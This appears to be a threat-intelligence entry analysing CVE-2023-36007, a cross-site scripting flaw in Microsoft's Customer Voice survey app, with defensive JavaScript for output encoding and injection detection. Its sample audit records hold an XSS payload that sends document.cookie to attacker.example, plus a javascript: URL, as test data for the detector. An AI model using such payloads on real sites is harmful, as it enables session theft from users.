CVE-2023-36007: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Microsoft Send Customer Voice survey from Dynamics 365 app
Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability
AI Analysis
Technical Summary
CVE-2023-36007 is a high-severity cross-site scripting (XSS) vulnerability in the Microsoft Send Customer Voice survey from Dynamics 365 app, recorded as affecting version 1.0.0.0. It is classified as CWE-79 (improper neutralization of input during web page generation): survey-related input supplied by a low-privileged authenticated user reaches a generated page without adequate encoding, so script can be injected into what the application renders. Microsoft's own title for the entry calls it a spoofing vulnerability, the label Microsoft normally applies to XSS in its products, because the injected content appears to come from the trusted application interface.

The CVSS 3.1 base score is 7.6 (High). The metrics are network attack vector (AV:N), low attack complexity (AC:L), low privileges required (PR:L), user interaction required (UI:R) and changed scope (S:C), with high confidentiality impact, low integrity impact and no availability impact. For an XSS flaw the changed scope reflects that the injected script executes in the recipient's browser rather than in the vulnerable component itself, so it acts with whatever the victim's browser session can reach. The practical consequences are disclosure of data visible to the victim's session, abuse of session material accessible to page script, and manipulation of displayed content to support phishing inside an interface the victim trusts. PR:L together with UI:R means the attacker needs an account able to author survey content and a victim who opens the resulting page or link.

No exploitation in the wild is reported. This record lists no patch reference; the authoritative fix status is Microsoft's Security Update Guide entry for CVE-2023-36007, which should be checked rather than relying on the absence of a reference here. The CVE was reserved in June 2023 and published in November 2023.
Potential Impact
For European organizations using Microsoft Dynamics 365 with the Send Customer Voice survey app, the vulnerability puts customer data confidentiality and the trust placed in survey communications at risk. Script executing in the context of an authenticated user can read data visible to that session, abuse session material reachable by page script, and present phishing content inside an interface users expect to be legitimate. Sectors that rely on Dynamics 365 for customer engagement and feedback collection, such as finance, healthcare, retail and public administration, are the most exposed. Altered survey data would also undermine the accuracy of the feedback collected, and any exposure of respondent data engages GDPR obligations. The changed-scope metric means the impact is realized in the recipient's browser, where the script can act against any resource the victim's session can reach, which is why the confidentiality rating is high even though the flaw sits in a single survey component. The PR:L and UI:R requirements narrow the attack surface: an attacker needs an account able to author survey content and a victim who opens the page. That condition is easily met in tenants with many survey authors, or where an insider or a compromised account is in play. The absence of known exploits provides a window for mitigation, but the score and the sensitivity of the data handled by the app warrant prompt attention.
Mitigation Recommendations
- Confirm the fix status first. The app is a Microsoft-hosted component that customers cannot patch themselves, so check the Microsoft Security Update Guide entry for CVE-2023-36007, apply any available update or workaround, and subscribe to Microsoft security advisories for changes.
- Restrict who can author or send Customer Voice surveys to the minimum set of users and service accounts; the PR:L metric means any account with that ability is a potential injection source.
- Where the organization's own code displays survey content (custom portals or integrations that render survey titles, questions or links), apply context-appropriate output encoding to every untrusted field and restrict links to http(s) URLs. Input validation inside the vendor application cannot be added by the customer and should not be assumed to exist.
- Deploy a Content Security Policy on organization-controlled pages that embed or render survey content, to limit inline script and unapproved script sources. CSP on pages served by Microsoft is outside the customer's control.
- Monitor audit logs for survey creation and edits, looking for markup, inline event-handler attributes or javascript: URLs in survey fields, and for unusual survey distribution volumes or recipients.
- Brief survey authors, administrators and recipients on unexpected or unsolicited survey links, and on reporting survey content that renders oddly.
- In high-risk environments handling sensitive data, consider disabling the Send Customer Voice survey feature until the fix is confirmed applied.
- Include XSS test cases for survey workflows in periodic penetration testing of the Dynamics 365 estate, covering any custom components that consume survey data.
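The output-encoding and log-monitoring recommendations above, as an added example that is not code from the original page or from Microsoft: it shows the unsafe concatenation pattern CWE-79 describes next to an encoded rendering, restricts survey links to http(s) URLs, and runs a simple injection-attempt check over audit records of survey edits. The survey field names, the audit-record layout, the user names and the payload values are all constructed for illustration; the rendering functions stand in for organization-owned code that displays survey content, not for the Microsoft app itself.

```javascript
// Added example, not code from the original page or from Microsoft.
// Survey fields, audit-record layout, users and values below are constructed.

// Encode a value for HTML text and double-quoted attribute contexts.
function encodeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Allow only absolute http(s) URLs in the survey link; anything else
// (javascript:, data:, relative or malformed) collapses to a harmless '#'.
function safeUrl(candidate) {
  try {
    const u = new URL(String(candidate));
    if (u.protocol === 'http:' || u.protocol === 'https:') return encodeHtml(u.href);
  } catch (_) {
    // unparsable URL: fall through to the safe default
  }
  return '#';
}

// CWE-79 pattern: attacker-controlled survey fields concatenated straight into markup.
function renderSurveyUnsafe(survey) {
  return `<h2>${survey.title}</h2><p>${survey.question}</p>` +
    `<a href="${survey.link}">Open survey</a>`;
}

// Hardened rendering: every untrusted value is encoded for the context it lands in.
function renderSurveySafe(survey) {
  return `<h2>${encodeHtml(survey.title)}</h2><p>${encodeHtml(survey.question)}</p>` +
    `<a href="${safeUrl(survey.link)}">Open survey</a>`;
}

// Indicators of script injection in survey text: tags that execute or load
// resources, inline event handlers, and javascript: URLs.
const INJECTION_PATTERNS = [
  /<\s*script\b/i,
  /<\s*(iframe|img|svg|object|embed|link|meta)\b/i,
  /\bon[a-z]+\s*=/i,
  /javascript\s*:/i,
];

// Return the audit records whose new field value matches an injection indicator.
function findInjectionAttempts(records) {
  return records
    .filter((r) => INJECTION_PATTERNS.some((p) => p.test(r.value)))
    .map((r) => ({ ts: r.ts, user: r.user, field: r.field }));
}

// Constructed audit records of survey edits (hypothetical users and values).
const AUDIT_RECORDS = [
  { ts: '2023-11-15T08:02:11Z', user: 'alice@example.com', field: 'question',
    value: 'How satisfied are you with the support you received?' },
  { ts: '2023-11-15T08:05:42Z', user: 'mallory@example.com', field: 'title',
    value: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' },
  { ts: '2023-11-15T08:06:03Z', user: 'mallory@example.com', field: 'link',
    value: 'javascript:alert(document.domain)' },
  { ts: '2023-11-15T08:09:30Z', user: 'bob@example.com', field: 'link',
    value: 'https://surveys.example.com/s?id=42&lang=en' },
];

// A survey whose title and link were set from the malicious audit entries.
const MALICIOUS_SURVEY = {
  title: AUDIT_RECORDS[1].value,
  question: 'Rate us from 1 to 5',
  link: AUDIT_RECORDS[2].value,
};

console.log(renderSurveySafe(MALICIOUS_SURVEY));
console.log(findInjectionAttempts(AUDIT_RECORDS));
```

The detector is deliberately narrow (executable tags, event handlers, javascript: URLs) so it can run over every survey edit without drowning analysts in benign formatting; a hit identifies the author account and the field, which is exactly what the privilege-review step above needs. Note that encoding alone does not make a link safe, which is why the URL goes through a scheme allow-list before it is encoded.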
Affected Countries
Germany, United Kingdom, France, Netherlands, Sweden, Belgium, Italy, Spain
Technical Details
- Data Version: 5.1
- Assigner Short Name: microsoft
- Date Reserved: 2023-06-20T20:44:39.822Z
- CISA Enriched: true
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 682d983bc4522896dcbee417
Added to database: 5/21/2025, 9:09:15 AM
Last enriched: 6/25/2025, 5:19:40 AM
Last updated: 7/28/2025, 1:10:56 AM